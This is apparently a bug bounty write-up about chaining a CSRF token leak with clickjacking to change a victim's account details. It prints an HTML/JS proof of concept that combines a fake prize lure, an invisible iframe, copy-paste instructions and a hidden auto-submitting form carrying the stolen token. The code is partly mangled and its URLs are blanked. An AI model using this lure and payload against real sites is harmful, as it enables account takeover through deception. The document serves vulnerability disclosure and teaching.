Bypass CSRF With ClickJacking Worth $1250

Hello friends, I hope you all are doing well, so this write up is all about how I chained the two different vulnerabilities to update the victim account details. Let’s assume the website name is

So when I visited the profile page tried to change the account details there was a CSRF token I tried different methods to bypass that CSRF protection but failed, then I found the suspicious endpoint that was disclosing the CSRF token

So when I opened that endpoint I found the CSRF token in the response, Now the next part was to steal the CSRF token & then I found out that there was no protection from the click jacking I created an HTML + JS Script to exploit the CSRF in just 1 Click

<!DOCTYPE html>

<center><h1 style=”color: blue; text-decoration: underline;”>Lucky Draw to Win a $100</h1></center>

<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>

<div style=”border: 2px solid gray;”>
<iframe src=”" width=”100%” style=”opacity: 0"></iframe>


<h3>Click inside the box and press CTRL+V</h3>
<input type=”password” name=”” size=”1">

<button id=”btn”>Click to Win</button>

<div style=”display: none;”>
<form action=”” method=”POST”>
<input type=”hidden” name=”addrid” value=”12741305" />
<input type=”hidden” name=”uname” value=”” />
<input type=”hidden” name=”issendmsg” value=”1" />
<input type=”hidden” name=”display” value=”” />
<input type=”hidden” name=”sendtype” value=”update” />
<input type=”hidden” name=”firstname” value=”accountinfo” />
<input type=”hidden” name=”lastname” value=”HACKED” />
<input type=”hidden” name=”country” value=”US” />
<input type=”hidden” name=”reglang” value=”en&#95;US” />
<input type=”hidden” name=”postcode” value=”1337" />
<input type=”submit” value=”Submit request” />


document.querySelector(“#btn”).onclick = function() {
var token = document.querySelector(“input”).value
var form = document.querySelector(“form”)

token = JSON.parse(token)
var mapInput = document.createElement(“input”);
mapInput.type = “hidden”; = “auth_token”;
mapInput.value = token.Value;


form.action = ``
alert(“Congratulation! You have won $100”)


Image for post
Image for post

So when the victim pastes the api response in the field & clicks on CLICK TO WIN. The js code will append the input field in form with the CSRF token that i got from victim & made request to update the account details & Boom it worked. I hope you like it


Written by

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store